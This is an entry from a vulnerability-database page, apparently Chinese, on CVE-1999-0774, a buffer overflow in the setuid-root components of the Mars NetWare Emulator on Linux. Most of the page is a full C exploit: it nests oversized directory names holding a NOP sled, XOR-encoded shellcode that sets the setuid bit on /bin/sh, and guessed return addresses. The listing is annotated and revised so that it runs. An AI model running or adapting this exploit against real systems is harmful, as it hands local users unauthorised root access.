Mars NEW缓冲区溢出漏洞
漏洞ID | 1105529 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-08-31 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0774 |
CNNVD-ID | CNNVD-199908-059 |
漏洞平台 | Linux | CVSS评分 | 7.2 |
|漏洞来源
|漏洞详情
Mars NetWare Emulation (NWE, mars_nwe) 软件包的 setuid root 组件存在缓冲区溢出漏洞:处理目录名时缺少边界检查,本地用户可借助超长目录名触发溢出,进而获得 root 权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/617/info
There are several buffer overflows in the setuid-root components of the Mars NetWare Emulator package: directory names are copied into fixed-size buffers without bounds checking, so a local user can overflow them and obtain root. All versions up to and including 0.99 should be assumed vulnerable. The exploit listing below is specific to 32-bit i386 Linux (32-bit shellcode and a hard-coded stack return address).
// get a suid shell :)
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <sys/stat.h>
#include <unistd.h>
#define BUFSIZE 254       /* length of the first directory name (NOP sled + shellcode) */
#define NOP 0x90          /* i386 NOP, used to build the sled */
#define RET 0xbffff3a0    /* guessed return address into the sled; i386 Linux stack of the era -- retune per target */
#define ALIGN 1           /* extra padding byte(s) in the second directory name (see 40 + ALIGN in main) */
/*
 * Create directory `dir` (mode 0777, subject to umask) and make it the
 * current working directory.
 *
 * Returns 0 on success, -1 if either mkdir() or chdir() fails; errno is
 * left as set by the failing call.
 */
int makedir(char *dir)
{
    int rc = mkdir(dir, S_IRWXU | S_IRWXG | S_IRWXO);

    if (rc == 0)
        rc = chdir(dir);

    return rc == 0 ? 0 : -1;
}
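/*
 * Entry point.  Builds three directory names of specific sizes and creates
 * them nested inside a per-pid work directory; per the advisory above, a
 * setuid-root mars_nwe component later copies such a path into a fixed-size
 * buffer without bounds checking, so the path is laid out to overwrite the
 * saved return address and land in the shellcode.
 *
 * Layout of the three names (32-bit i386 Linux only):
 *   1. BUFSIZE bytes: NOP sled followed by the self-decoding shellcode
 *   2. 40 + ALIGN NOP bytes
 *   3. 96 bytes of the guessed return address RET, repeated (created twice)
 *
 * Fixes relative to the original listing: the payload buffer had no room
 * for a terminator (the terminator was written one byte past buf[] and the
 * name was not NUL-terminated), a dead `*ptr += noplen` modified an
 * uninitialized byte, the pid was formatted with unbounded sprintf(), and the
 * return-address fill used `*(long *)` (8 bytes on LP64, which would inject
 * NUL bytes) -- memcpy of a uint32_t writes the intended 4 bytes.
 *
 * Returns 0 on success, -1 if the shellcode does not fit or any
 * mkdir()/chdir() fails (reported via perror()).
 */
int main(void)
{
    /*
     * Self-decoding shellcode: a 13-byte jmp/call/pop stub followed by
     * 0x88 bytes XORed with 0x01 and decoded in place at run time.  The
     * decoded bytes contain the strings "/bin/chmod", "4755" and "/bin/sh",
     * i.e. it appears to exec `chmod 4755 /bin/sh` to leave a setuid shell.
     */
    static const char szelkod[] =
        "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d"
        "\x31\xc9\xb1\x88\x80\x36\x01\x46\xe2\xfa\xea\x19\x2e"
        "\x63\x68\x6f\x2e\x62\x69\x6c\x6e\x65\x01\x35\x36\x34"
        "\x34\x01\x2e\x63\x68\x6f\x2e\x72\x69\x01\x88\xf7\x54"
        "\x88\xe4\x82\xed\x19\x56\x57\x52\xe9\x01\x01\x01\x01"
        "\x5a\x80\xc2\xcf\x11\x01\x01\x8c\xba\x0b\xee\xfe\xfe"
        "\x88\x7c\xf1\x8c\x82\x14\xee\xfe\xfe\x88\x44\xf5\x8c"
        "\x92\x1b\xee\xfe\xfe\x88\x54\xf9\xc6\x44\xfd\x01\x01"
        "\x01\x01\xb9\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88"
        "\xf2\xcc\x81\x8c\x44\xf1\x88\xc0\xb9\x0a\x01\x01\x01"
        "\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x8c\x64\xdd\x5a"
        "\x5f\x5e\xc8\xc2\x91\x91\x91\x91\x91\x91\x91\x91\x91"
        "\x91\x91\x91\x00";
    size_t sclen = strlen(szelkod);
    size_t noplen;
    int i;
    char pid[32];
    char buf[BUFSIZE + 1];     /* +1: room for the terminating NUL */
    uint32_t ret = RET;        /* host-endian, matches the i386 target */

    /* Refuse to build a sled of negative length if the payload outgrows BUFSIZE. */
    if (sclen > BUFSIZE) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit in BUFSIZE (%d)\n",
                sclen, BUFSIZE);
        return -1;
    }
    noplen = BUFSIZE - sclen;

    /* Work inside a directory named after our pid so repeated runs do not collide. */
    snprintf(pid, sizeof pid, "%ld", (long)getpid());
    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) {
        perror("mkdir()");
        return -1;
    }
    if (chdir(pid)) {
        perror("chdir()");
        return -1;
    }

    /* Name 1: NOP sled padding up to BUFSIZE, shellcode at the end, NUL-terminated. */
    memset(buf, NOP, noplen);
    memcpy(buf + noplen, szelkod, sclen);
    buf[BUFSIZE] = '\0';
    if (makedir(buf) < 0) {
        perror("makedir()");
        return -1;
    }

    /* Name 2: 40 + ALIGN NOP bytes; the rest of buf is zero, so the name is terminated. */
    memset(buf, 0, sizeof buf);
    memset(buf, NOP, 40 + ALIGN);
    if (makedir(buf) < 0) {
        perror("makedir()");
        return -1;
    }

    /* Name 3: 96 bytes of the guessed return address, repeated as 4-byte words. */
    memset(buf, 0, sizeof buf);
    for (i = 0; i < 96; i += 4)
        memcpy(&buf[i], &ret, sizeof ret);
    for (i = 0; i < 2; i++) {
        if (makedir(buf) < 0) {
            perror("makedir()");
            return -1;
        }
    }
    return 0;
}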
|参考资料
来源:BID
名称:617
链接:http://www.securityfocus.com/bid/617